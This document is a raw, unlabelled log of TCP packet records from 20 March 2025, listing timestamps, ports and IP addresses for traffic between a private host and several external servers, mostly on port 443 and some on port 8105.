Mar 20, 2025 23:53:02.364029884 CET	443	60846	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364089012 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364090919 CET	443	60846	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364147902 CET	443	60846	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364161968 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364192009 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364206076 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364217997 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364253044 CET	443	60846	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364335060 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364337921 CET	60846	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364339113 CET	60846	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364339113 CET	60846	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364423037 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364435911 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364464998 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.364506006 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.364514112 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.365377903 CET	60846	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.365417957 CET	443	60846	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.368240118 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.368361950 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.368393898 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.369266033 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.369348049 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.369358063 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.372822046 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.372884989 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.372894049 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.374174118 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.374231100 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.374239922 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.380175114 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.380244017 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.380253077 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.383037090 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.383095026 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.383102894 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.386399031 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.386472940 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.386480093 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.389308929 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.389365911 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.389377117 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.392362118 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.392432928 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.392447948 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.435509920 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.454083920 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.455812931 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.455902100 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.455912113 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.456911087 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.456974983 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.456983089 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.461935997 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.462025881 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.462052107 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.462080956 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.462131023 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.464690924 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.464863062 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.464931011 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.464946985 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.464998960 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:02.465049982 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.465261936 CET	60847	443	192.168.2.24	199.232.196.193
Mar 20, 2025 23:53:02.465279102 CET	443	60847	199.232.196.193	192.168.2.24
Mar 20, 2025 23:53:04.948271990 CET	443	60832	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:04.948442936 CET	443	60832	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:04.948625088 CET	60832	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:05.123028040 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.123028994 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.123146057 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.288841963 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.288883924 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.288914919 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.288949966 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.549926043 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.550146103 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.550637007 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.550676107 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.550698042 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.550731897 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.557914972 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.574801922 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.656052113 CET	60832	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:05.656117916 CET	443	60832	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:05.723510981 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.741934061 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.754506111 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.754810095 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.755157948 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.755199909 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.755223036 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.755259991 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.774032116 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.774544001 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.775579929 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.920922041 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.921107054 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.982472897 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.989245892 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.989424944 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:05.989633083 CET	443	60817	2.19.122.66	192.168.2.24
Mar 20, 2025 23:53:05.989701033 CET	60817	443	192.168.2.24	2.19.122.66
Mar 20, 2025 23:53:13.759408951 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:13.909198999 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:13.909477949 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:13.909477949 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.060136080 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:14.060204983 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:14.060362101 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.062294960 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.062947989 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.212344885 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:14.212559938 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:14.212769985 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.316292048 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.316363096 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.316442013 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.316618919 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.316634893 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.527791023 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.527894020 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.528862953 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.528882027 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.529398918 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.529676914 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.572335958 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.766540051 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.766680002 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.766845942 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.767673969 CET	60853	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:14.767714977 CET	443	60853	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:14.769335985 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:14.870557070 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:14.870645046 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:14.870886087 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:14.870997906 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:14.871027946 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:14.959898949 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:15.077435017 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.077538967 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:15.077934027 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:15.077965021 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.078639030 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.078978062 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:15.120335102 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.335980892 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.336133003 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:15.336322069 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:15.336955070 CET	60854	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:15.336996078 CET	443	60854	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:21.724065065 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:21.875602007 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:21.875719070 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:21.875951052 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:22.025899887 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:22.026173115 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:22.026575089 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:22.049978018 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.050071955 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.050158024 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.050337076 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.050362110 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.176131010 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:22.176191092 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:22.180715084 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.180803061 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.182821989 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.182930946 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.182962894 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.228523016 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:22.387706995 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.395397902 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.395457029 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.395587921 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.395603895 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.523117065 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.523272038 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.524137020 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.524168968 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.524693012 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.524952888 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:22.568360090 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:22.633898973 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.634047985 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.634130955 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.635072947 CET	60858	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:22.635129929 CET	443	60858	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:22.636219978 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:22.638354063 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:22.638439894 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:22.638534069 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:22.638732910 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:22.638767004 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:22.827176094 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:22.847893953 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:22.848242998 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:22.848309994 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:22.848387957 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:22.848403931 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:23.101147890 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:23.101272106 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:23.101644993 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:23.102345943 CET	60859	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:23.102410078 CET	443	60859	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:38.986629963 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:38.986809015 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:38.986862898 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:38.987358093 CET	60857	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:38.987405062 CET	443	60857	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.325475931 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.325531006 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.325589895 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.326306105 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.326323032 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.639602900 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.639673948 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.643018961 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.643030882 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.643549919 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:39.643913031 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:39.684401035 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:40.137209892 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:40.137351990 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:40.137542009 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:40.138401031 CET	60862	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:40.138426065 CET	443	60862	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.467439890 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.467530012 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.467854977 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.468072891 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:54.468240976 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.468302965 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.625452995 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:54.625582933 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:54.627351999 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:54.679500103 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:54.679585934 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:54.680035114 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:54.680917978 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:54.680955887 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:54.782128096 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.788507938 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:54.822443962 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.833997011 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.834049940 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.834131002 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:54.834165096 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:53:54.834181070 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:53:54.835534096 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:54.883208036 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:54.883682013 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:53:54.883739948 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:53:54.991931915 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:54.991991043 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:54.994750977 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:54.994833946 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:54.995091915 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:54.995091915 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:54.995183945 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.037076950 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:55.203869104 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.204261065 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:55.204329014 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.204408884 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:55.204423904 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.455456018 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.455517054 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.455591917 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:55.456548929 CET	60873	443	192.168.2.24	104.26.13.205
Mar 20, 2025 23:53:55.456597090 CET	443	60873	104.26.13.205	192.168.2.24
Mar 20, 2025 23:53:55.457905054 CET	60871	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:53:55.459980965 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.460011005 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.460067987 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.460220098 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.460237980 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.655232906 CET	8105	60871	185.174.100.76	192.168.2.24
Mar 20, 2025 23:53:55.664841890 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.665309906 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.665326118 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.665467978 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.665472984 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.916338921 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.916399002 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:55.916448116 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.918349981 CET	60874	443	192.168.2.24	104.26.12.205
Mar 20, 2025 23:53:55.918365955 CET	443	60874	104.26.12.205	192.168.2.24
Mar 20, 2025 23:53:59.961740017 CET	60852	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:00.112411976 CET	8105	60852	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:04.869267941 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:04.869416952 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:04.869678974 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:06.401192904 CET	60872	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:54:06.401258945 CET	443	60872	142.251.35.164	192.168.2.24
Mar 20, 2025 23:54:07.832345963 CET	60856	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:07.983186007 CET	8105	60856	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:11.716728926 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:11.716909885 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:11.716985941 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:11.718230009 CET	60870	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:11.718295097 CET	443	60870	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:11.742580891 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:11.742671967 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:11.742916107 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:11.743055105 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:11.743086100 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.048180103 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.048777103 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:12.048811913 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.048845053 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:12.048851967 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.534634113 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.534734964 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:12.535170078 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:12.535845041 CET	60880	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:12.535907030 CET	443	60880	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.355535984 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:19.355580091 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.355659008 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:19.356762886 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:19.357357979 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:19.357374907 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.507271051 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:19.507549047 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:19.507648945 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:19.658389091 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:19.658795118 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:19.659172058 CET	60883	8105	192.168.2.24	185.174.100.76
Mar 20, 2025 23:54:19.672620058 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.672849894 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:19.672883034 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.672977924 CET	60882	443	192.168.2.24	104.168.138.190
Mar 20, 2025 23:54:19.672986031 CET	443	60882	104.168.138.190	192.168.2.24
Mar 20, 2025 23:54:19.808914900 CET	8105	60883	185.174.100.76	192.168.2.24
Mar 20, 2025 23:54:19.809273958 CET	8105	60883	185.174.100.76	192.168.2.24
